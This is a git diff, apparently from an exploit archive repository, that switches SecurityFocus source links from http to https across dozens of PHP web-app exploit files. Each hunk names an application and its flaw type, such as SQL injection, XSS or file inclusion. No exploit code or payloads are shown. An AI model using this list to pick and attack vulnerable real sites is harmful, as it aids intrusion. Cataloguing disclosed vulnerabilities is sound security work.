@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23400/info +source: https://www.securityfocus.com/bid/23400/info DropAFew is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29832.txt b/exploits/php/webapps/29832.txt index 286bc5bd0..3bed00daa 100644 --- a/exploits/php/webapps/29832.txt +++ b/exploits/php/webapps/29832.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23400/info +source: https://www.securityfocus.com/bid/23400/info DropAFew is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29833.txt b/exploits/php/webapps/29833.txt index ea7868e9b..fdfe834be 100644 --- a/exploits/php/webapps/29833.txt +++ b/exploits/php/webapps/29833.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23400/info +source: https://www.securityfocus.com/bid/23400/info DropAFew is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29838.txt b/exploits/php/webapps/29838.txt index c9ce99752..91f1ef50e 100644 --- a/exploits/php/webapps/29838.txt +++ b/exploits/php/webapps/29838.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23411/info +source: https://www.securityfocus.com/bid/23411/info DotClear is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29839.txt b/exploits/php/webapps/29839.txt index db7b9ac70..776a229e6 100644 --- a/exploits/php/webapps/29839.txt +++ b/exploits/php/webapps/29839.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23411/info +source: https://www.securityfocus.com/bid/23411/info DotClear is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29841.txt b/exploits/php/webapps/29841.txt index 5ea11aa32..54c550d29 100644 --- a/exploits/php/webapps/29841.txt +++ b/exploits/php/webapps/29841.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23419/info +source: https://www.securityfocus.com/bid/23419/info TopSites is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29845.txt b/exploits/php/webapps/29845.txt index 519135eba..8579c8847 100644 --- a/exploits/php/webapps/29845.txt +++ b/exploits/php/webapps/29845.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23448/info +source: https://www.securityfocus.com/bid/23448/info The 'phpwebnews' package is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29846.txt b/exploits/php/webapps/29846.txt index 1e0acf6fc..1a3ca2142 100644 --- a/exploits/php/webapps/29846.txt +++ b/exploits/php/webapps/29846.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23448/info +source: https://www.securityfocus.com/bid/23448/info The 'phpwebnews' package is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29847.txt b/exploits/php/webapps/29847.txt index 73925c653..8cd6090f2 100644 --- a/exploits/php/webapps/29847.txt +++ b/exploits/php/webapps/29847.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23448/info +source: https://www.securityfocus.com/bid/23448/info The 'phpwebnews' package is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29848.txt b/exploits/php/webapps/29848.txt index 0063ac4f5..a1c46b83d 100644 --- a/exploits/php/webapps/29848.txt +++ b/exploits/php/webapps/29848.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23452/info +source: https://www.securityfocus.com/bid/23452/info TuMusika Evolution is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29849.html b/exploits/php/webapps/29849.html index 22c714056..5e4b92b69 100644 --- a/exploits/php/webapps/29849.html +++ b/exploits/php/webapps/29849.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23453/info +source: https://www.securityfocus.com/bid/23453/info ToendaCMS is prone to an HTML-injection scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29851.txt b/exploits/php/webapps/29851.txt index 95b939f37..68ea5e4d7 100644 --- a/exploits/php/webapps/29851.txt +++ b/exploits/php/webapps/29851.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23481/info +source: https://www.securityfocus.com/bid/23481/info MailBee WebMail Pro is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29852.txt b/exploits/php/webapps/29852.txt index 34f0ca21f..e07f45732 100644 --- a/exploits/php/webapps/29852.txt +++ b/exploits/php/webapps/29852.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23482/info +source: https://www.securityfocus.com/bid/23482/info Doop Content Management System is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29854.txt b/exploits/php/webapps/29854.txt index 270064a98..184f7de80 100644 --- a/exploits/php/webapps/29854.txt +++ b/exploits/php/webapps/29854.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23487/info +source: https://www.securityfocus.com/bid/23487/info BloofoxCMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29855.txt b/exploits/php/webapps/29855.txt index 16fbd6d21..ec32d43ba 100644 --- a/exploits/php/webapps/29855.txt +++ b/exploits/php/webapps/29855.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23488/info +source: https://www.securityfocus.com/bid/23488/info FloweRS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29862.pl b/exploits/php/webapps/29862.pl index 228802502..35b0a0668 100755 --- a/exploits/php/webapps/29862.pl +++ b/exploits/php/webapps/29862.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23499/info +source: https://www.securityfocus.com/bid/23499/info News Manager Deluxe is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29863.txt b/exploits/php/webapps/29863.txt index 2d298f9e9..7fa594fdc 100644 --- a/exploits/php/webapps/29863.txt +++ b/exploits/php/webapps/29863.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23504/info +source: https://www.securityfocus.com/bid/23504/info Actionpoll is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29864.php b/exploits/php/webapps/29864.php index 32696c52f..5f83e3063 100644 --- a/exploits/php/webapps/29864.php +++ b/exploits/php/webapps/29864.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23521/info +source: https://www.securityfocus.com/bid/23521/info MyBlog is prone to an authentication-bypass vulnerability. diff --git a/exploits/php/webapps/29865.txt b/exploits/php/webapps/29865.txt index 00a03c63c..db33116f0 100644 --- a/exploits/php/webapps/29865.txt +++ b/exploits/php/webapps/29865.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23526/info +source: https://www.securityfocus.com/bid/23526/info Wabbit Gallery Script is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29866.txt b/exploits/php/webapps/29866.txt index e1fb98818..1f3fe6df5 100644 --- a/exploits/php/webapps/29866.txt +++ b/exploits/php/webapps/29866.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23528/info +source: https://www.securityfocus.com/bid/23528/info PHP-Nuke is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29868.txt b/exploits/php/webapps/29868.txt index b99295e0e..2277d7b55 100644 --- a/exploits/php/webapps/29868.txt +++ b/exploits/php/webapps/29868.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23555/info +source: https://www.securityfocus.com/bid/23555/info NuclearBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. 
diff --git a/exploits/php/webapps/29869.php b/exploits/php/webapps/29869.php index a4ec1eeea..6b93ecafe 100644 --- a/exploits/php/webapps/29869.php +++ b/exploits/php/webapps/29869.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23565/info +source: https://www.securityfocus.com/bid/23565/info Fully Modded PHPBB2 is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29870.txt b/exploits/php/webapps/29870.txt index b8357e7d5..bbea26cdc 100644 --- a/exploits/php/webapps/29870.txt +++ b/exploits/php/webapps/29870.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23574/info +source: https://www.securityfocus.com/bid/23574/info Exponent CMS is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29871.txt b/exploits/php/webapps/29871.txt index 35695fc7f..c94f092df 100644 --- a/exploits/php/webapps/29871.txt +++ b/exploits/php/webapps/29871.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23574/info +source: https://www.securityfocus.com/bid/23574/info Exponent CMS is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29872.txt b/exploits/php/webapps/29872.txt index 30b5d25c2..eeccd4ad3 100644 --- a/exploits/php/webapps/29872.txt +++ b/exploits/php/webapps/29872.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23574/info +source: https://www.securityfocus.com/bid/23574/info Exponent CMS is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29874.txt b/exploits/php/webapps/29874.txt index 12438d896..fc6b1cdec 100644 --- a/exploits/php/webapps/29874.txt +++ b/exploits/php/webapps/29874.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23580/info +source: https://www.securityfocus.com/bid/23580/info PHP Turbulence is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29876.txt b/exploits/php/webapps/29876.txt index c37b95163..5d64b90a1 100644 --- a/exploits/php/webapps/29876.txt +++ b/exploits/php/webapps/29876.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23593/info +source: https://www.securityfocus.com/bid/23593/info TJSChat is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29877.html b/exploits/php/webapps/29877.html index 151395135..6ba7a245c 100644 --- a/exploits/php/webapps/29877.html +++ b/exploits/php/webapps/29877.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23597/info +source: https://www.securityfocus.com/bid/23597/info diff --git a/exploits/php/webapps/29878.txt b/exploits/php/webapps/29878.txt index f52ea9cd8..a119dc26f 100644 --- a/exploits/php/webapps/29878.txt +++ b/exploits/php/webapps/29878.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23598/info +source: https://www.securityfocus.com/bid/23598/info Allfaclassifieds is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29879.txt b/exploits/php/webapps/29879.txt index 99f69370f..b9b16eed9 100644 --- a/exploits/php/webapps/29879.txt +++ b/exploits/php/webapps/29879.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23599/info +source: https://www.securityfocus.com/bid/23599/info PHPMyBibli is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29880.txt b/exploits/php/webapps/29880.txt index 1a9d7e25d..cfe96383b 100644 
--- a/exploits/php/webapps/29880.txt +++ b/exploits/php/webapps/29880.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23600/info +source: https://www.securityfocus.com/bid/23600/info File117 is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29882.html b/exploits/php/webapps/29882.html index 9ce44f5e3..4c54a6a0f 100644 --- a/exploits/php/webapps/29882.html +++ b/exploits/php/webapps/29882.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23602/info +source: https://www.securityfocus.com/bid/23602/info phpMySpace Gold is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29883.txt b/exploits/php/webapps/29883.txt index 48e412258..3072fcbe1 100644 --- a/exploits/php/webapps/29883.txt +++ b/exploits/php/webapps/29883.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23603/info +source: https://www.securityfocus.com/bid/23603/info acvsws_php5 is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29885.txt b/exploits/php/webapps/29885.txt index 5b009f64c..61e9da3b3 100644 --- a/exploits/php/webapps/29885.txt +++ b/exploits/php/webapps/29885.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23609/info +source: https://www.securityfocus.com/bid/23609/info Claroline is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29886.txt b/exploits/php/webapps/29886.txt index fe6e42b12..b9ceb9c89 100644 --- a/exploits/php/webapps/29886.txt +++ b/exploits/php/webapps/29886.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23611/info +source: https://www.securityfocus.com/bid/23611/info LMS is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29887.txt b/exploits/php/webapps/29887.txt index 84eacc73c..a73700545 100644 --- a/exploits/php/webapps/29887.txt +++ b/exploits/php/webapps/29887.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23616/info +source: https://www.securityfocus.com/bid/23616/info Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29888.txt b/exploits/php/webapps/29888.txt index 16b8baa94..ce45800f4 100644 --- a/exploits/php/webapps/29888.txt +++ b/exploits/php/webapps/29888.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23616/info +source: https://www.securityfocus.com/bid/23616/info Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29889.txt b/exploits/php/webapps/29889.txt index 9592fff51..ba225a917 100644 --- a/exploits/php/webapps/29889.txt +++ b/exploits/php/webapps/29889.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23616/info +source: https://www.securityfocus.com/bid/23616/info Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. 
diff --git a/exploits/php/webapps/29890.txt b/exploits/php/webapps/29890.txt index 8bf0a92aa..0ea3ff414 100644 --- a/exploits/php/webapps/29890.txt +++ b/exploits/php/webapps/29890.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23616/info +source: https://www.securityfocus.com/bid/23616/info Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29891.txt b/exploits/php/webapps/29891.txt index 8662b0c9a..b4a142205 100644 --- a/exploits/php/webapps/29891.txt +++ b/exploits/php/webapps/29891.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23616/info +source: https://www.securityfocus.com/bid/23616/info Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29892.html b/exploits/php/webapps/29892.html index f932dd1b9..b8f7a7723 100644 --- a/exploits/php/webapps/29892.html +++ b/exploits/php/webapps/29892.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23616/info +source: https://www.securityfocus.com/bid/23616/info Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29893.txt b/exploits/php/webapps/29893.txt index ac6700e5c..6744dc600 100644 --- a/exploits/php/webapps/29893.txt +++ b/exploits/php/webapps/29893.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23616/info +source: https://www.securityfocus.com/bid/23616/info Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29894.txt b/exploits/php/webapps/29894.txt index 85523d374..65fffa6e2 100644 --- a/exploits/php/webapps/29894.txt +++ b/exploits/php/webapps/29894.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23616/info +source: https://www.securityfocus.com/bid/23616/info Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29895.txt b/exploits/php/webapps/29895.txt index acc7e850b..7e8a8832e 100644 --- a/exploits/php/webapps/29895.txt +++ b/exploits/php/webapps/29895.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23624/info +source: https://www.securityfocus.com/bid/23624/info phpMyAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29898.txt b/exploits/php/webapps/29898.txt index 3ff553d98..3b4c06408 100644 --- a/exploits/php/webapps/29898.txt +++ b/exploits/php/webapps/29898.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23639/info +source: https://www.securityfocus.com/bid/23639/info Plesk is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29899.txt b/exploits/php/webapps/29899.txt index 55836cbad..bf7d22b95 100644 --- a/exploits/php/webapps/29899.txt 
+++ b/exploits/php/webapps/29899.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23646/info +source: https://www.securityfocus.com/bid/23646/info MyNewsGroups is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29902.txt b/exploits/php/webapps/29902.txt index 60b5ee0eb..4eae90a08 100644 --- a/exploits/php/webapps/29902.txt +++ b/exploits/php/webapps/29902.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23657/info +source: https://www.securityfocus.com/bid/23657/info PHPMyTGP is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29903.txt b/exploits/php/webapps/29903.txt index b0cb25765..b078c6982 100644 --- a/exploits/php/webapps/29903.txt +++ b/exploits/php/webapps/29903.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23658/info +source: https://www.securityfocus.com/bid/23658/info Ahhp Portal is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29904.txt b/exploits/php/webapps/29904.txt index 101225513..c62ba810a 100644 --- a/exploits/php/webapps/29904.txt +++ b/exploits/php/webapps/29904.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23659/info +source: https://www.securityfocus.com/bid/23659/info B2 is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29905.txt b/exploits/php/webapps/29905.txt index 489883ff2..bf8d27ad9 100644 --- a/exploits/php/webapps/29905.txt +++ b/exploits/php/webapps/29905.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23659/info +source: https://www.securityfocus.com/bid/23659/info B2 is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29906.txt b/exploits/php/webapps/29906.txt index d6be17022..5d0571e9c 100644 --- a/exploits/php/webapps/29906.txt +++ b/exploits/php/webapps/29906.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23659/info +source: https://www.securityfocus.com/bid/23659/info B2 is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29907.txt b/exploits/php/webapps/29907.txt index b6082360e..e72b3a27e 100644 --- a/exploits/php/webapps/29907.txt +++ b/exploits/php/webapps/29907.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23661/info +source: https://www.securityfocus.com/bid/23661/info Comus is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29908.txt b/exploits/php/webapps/29908.txt index 98657ef9c..55a91d6ea 100644 --- a/exploits/php/webapps/29908.txt +++ b/exploits/php/webapps/29908.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23662/info +source: https://www.securityfocus.com/bid/23662/info Sunshop is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29909.txt b/exploits/php/webapps/29909.txt index 5c91f0561..1ff5ee24b 100644 --- a/exploits/php/webapps/29909.txt +++ b/exploits/php/webapps/29909.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23663/info +source: https://www.securityfocus.com/bid/23663/info HYIP Manager Pro is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. 
diff --git a/exploits/php/webapps/29910.txt b/exploits/php/webapps/29910.txt index 0973a1e32..3c15e9c25 100644 --- a/exploits/php/webapps/29910.txt +++ b/exploits/php/webapps/29910.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23664/info +source: https://www.securityfocus.com/bid/23664/info htmlEditbox is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29911.txt b/exploits/php/webapps/29911.txt index f688847bb..01f350888 100644 --- a/exploits/php/webapps/29911.txt +++ b/exploits/php/webapps/29911.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23667/info +source: https://www.securityfocus.com/bid/23667/info DynaTracker is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29912.txt b/exploits/php/webapps/29912.txt index 56733416a..4d8d1c614 100644 --- a/exploits/php/webapps/29912.txt +++ b/exploits/php/webapps/29912.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23667/info +source: https://www.securityfocus.com/bid/23667/info DynaTracker is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29913.txt b/exploits/php/webapps/29913.txt index bb2c30394..825ebe2fb 100644 --- a/exploits/php/webapps/29913.txt +++ b/exploits/php/webapps/29913.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23670/info +source: https://www.securityfocus.com/bid/23670/info Active PHP Bookmarks is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29914.txt b/exploits/php/webapps/29914.txt index 4651b61a8..122acdebd 100644 --- a/exploits/php/webapps/29914.txt +++ b/exploits/php/webapps/29914.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23675/info +source: https://www.securityfocus.com/bid/23675/info Doruk100Net is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29915.txt b/exploits/php/webapps/29915.txt index 0e04592d5..87a084fae 100644 --- a/exploits/php/webapps/29915.txt +++ b/exploits/php/webapps/29915.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23676/info +source: https://www.securityfocus.com/bid/23676/info MoinMoin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29938.txt b/exploits/php/webapps/29938.txt index 953fcbb18..a8d18e996 100644 --- a/exploits/php/webapps/29938.txt +++ b/exploits/php/webapps/29938.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23727/info +source: https://www.securityfocus.com/bid/23727/info E-Annu is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29941.txt b/exploits/php/webapps/29941.txt index 3a04e18c7..01d8d1542 100644 --- a/exploits/php/webapps/29941.txt +++ b/exploits/php/webapps/29941.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23753/info +source: https://www.securityfocus.com/bid/23753/info CMS Made Simple is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29944.pl b/exploits/php/webapps/29944.pl index f2f2432fb..d4425def1 100755 --- a/exploits/php/webapps/29944.pl +++ b/exploits/php/webapps/29944.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23801/info +source: https://www.securityfocus.com/bid/23801/info PHPSecurityAdmin is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29953.txt b/exploits/php/webapps/29953.txt index aa68db4db..19d61f392 100644 --- a/exploits/php/webapps/29953.txt +++ b/exploits/php/webapps/29953.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23843/info +source: https://www.securityfocus.com/bid/23843/info PHP Content Architect is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29955.txt b/exploits/php/webapps/29955.txt index 996728547..765ca140f 100644 --- a/exploits/php/webapps/29955.txt +++ b/exploits/php/webapps/29955.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23845/info +source: https://www.securityfocus.com/bid/23845/info The WF-Quote module for the Xoops CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29956.txt b/exploits/php/webapps/29956.txt index 590d79265..a22c30737 100644 --- a/exploits/php/webapps/29956.txt +++ b/exploits/php/webapps/29956.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23847/info +source: https://www.securityfocus.com/bid/23847/info Mini Web Shop is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29957.txt b/exploits/php/webapps/29957.txt index c8438a1c6..31a9ccdc7 100644 --- a/exploits/php/webapps/29957.txt +++ b/exploits/php/webapps/29957.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23847/info +source: https://www.securityfocus.com/bid/23847/info Mini Web Shop is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29960.txt b/exploits/php/webapps/29960.txt index f98f3ea7c..8ba0e5967 100644 --- a/exploits/php/webapps/29960.txt +++ b/exploits/php/webapps/29960.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23856/info +source: https://www.securityfocus.com/bid/23856/info TurnkeyWebTools SunShop Shopping Cart is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29961.txt b/exploits/php/webapps/29961.txt index 0385d682b..6d757d81e 100644 --- a/exploits/php/webapps/29961.txt +++ b/exploits/php/webapps/29961.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23856/info +source: https://www.securityfocus.com/bid/23856/info TurnkeyWebTools SunShop Shopping Cart is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29963.txt b/exploits/php/webapps/29963.txt index 913f7fb4b..8f00221bf 100644 --- a/exploits/php/webapps/29963.txt +++ b/exploits/php/webapps/29963.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23864/info +source: https://www.securityfocus.com/bid/23864/info Kayako eSupport is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29965.txt b/exploits/php/webapps/29965.txt index 39d5048d5..4a4f81607 100644 --- a/exploits/php/webapps/29965.txt +++ b/exploits/php/webapps/29965.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23873/info +source: https://www.securityfocus.com/bid/23873/info Advanced Guestbook is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29966.txt b/exploits/php/webapps/29966.txt index 71219b930..111094d2d 100644 --- a/exploits/php/webapps/29966.txt +++ b/exploits/php/webapps/29966.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29967.txt b/exploits/php/webapps/29967.txt index 459bf6036..33db2ab72 100644 --- a/exploits/php/webapps/29967.txt +++ b/exploits/php/webapps/29967.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29968.txt b/exploits/php/webapps/29968.txt index c8419ba88..752fa797f 100644 --- 